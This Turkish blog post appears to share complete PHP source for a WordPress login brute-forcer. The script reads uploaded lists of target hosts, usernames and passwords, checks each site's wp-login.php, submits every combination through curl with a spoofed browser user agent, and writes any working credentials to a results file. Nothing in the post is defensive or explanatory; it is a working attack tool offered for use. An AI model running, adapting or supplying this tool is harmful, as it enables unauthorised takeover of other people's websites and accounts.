Priv8 WordPress Brute Force Tool [PHP]

Yazar: Unknown Tarih: 13:20 Kategori: , Yorum: Yorum Yap

<?php echo ' # Wp <form method="post" action="" enctype="multipart/form-data"> hosts : <input type="file" name="host"><br> users: <input type="file" name="user"><br> w0rd list .: <input type="file" name="pass"><br> <input type="submit" name="x" value="start ..!"> </form> '; if(!isset($_POST['x'])){ exit(); } if (!extension_loaded('curl')) die("cURL extension required\n"); error_reporting(0); set_time_limit(0); $file_host = $_FILES["host"]["tmp_name"]; $file_user = $_FILES["user"]["tmp_name"]; $file_pass = $_FILES["pass"]["tmp_name"]; $wp_crack = new wp_cracker(); $crack = $wp_crack->cracker($file_host,$file_user,$file_pass); if($crack){die('# END Brute Forcer - S3n4t00r - Sec-w.com');} class wp_cracker{ public function cracker($file_host,$file_user,$file_pass){ $list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?"); $list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n"); $list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? \n"); $exp_host = explode("\n",$list_host); $exp_user = explode("\n",$list_user); $exp_pass = explode("\n",$list_pass); $c_host = count($exp_host); $c_user = count($exp_user); $c_pass = count($exp_pass); foreach ($exp_host as $host){ $host = str_replace('http://','',trim($host)); $get = get_headers("http://$host/wp-login.php"); if (!preg_match("/200 OK/",$get[0])){ continue; flush(); } foreach($exp_user as $user) { flush(); foreach($exp_pass as $pass){ flush(); $host = trim($host); $user = trim($user); $pass = trim($pass); echo "Testing -> $host:$user:$pass <br />"; $login = $this->login($host,$user,$pass); if($login){echo "<b> [+] Found : $host:$user:$pass </b><br />"; $this->save($host,$user,$pass); flush(); }else{continue;} ob_clear ; flush(); } ob_clear ; flush(); } ob_clear; flush(); } return true; } private function login($host,$user,$pass){ $curl = curl_init(); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&testcookie=1"); curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_VERBOSE,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)'); curl_setopt($curl, CURLOPT_COOKIEJAR,"COOKIE.txt"); curl_setopt($curl, CURLOPT_COOKIEFILE,"COOKIE.txt"); $ex = curl_exec($curl); if($ex){ if(!preg_match('/ERROR/',$ex)){ curl_close($curl); return true; } } curl_close($curl); return false; } private function save($host,$user,$pass){ $f = fopen('wp_rsult.html','ab'); $w = fwrite($f,"[$host] - [$user] - [$pass) <br /><br />"); if($w){return true;} } }

Paylaş:

Paylaş Paylaş

0 yorum: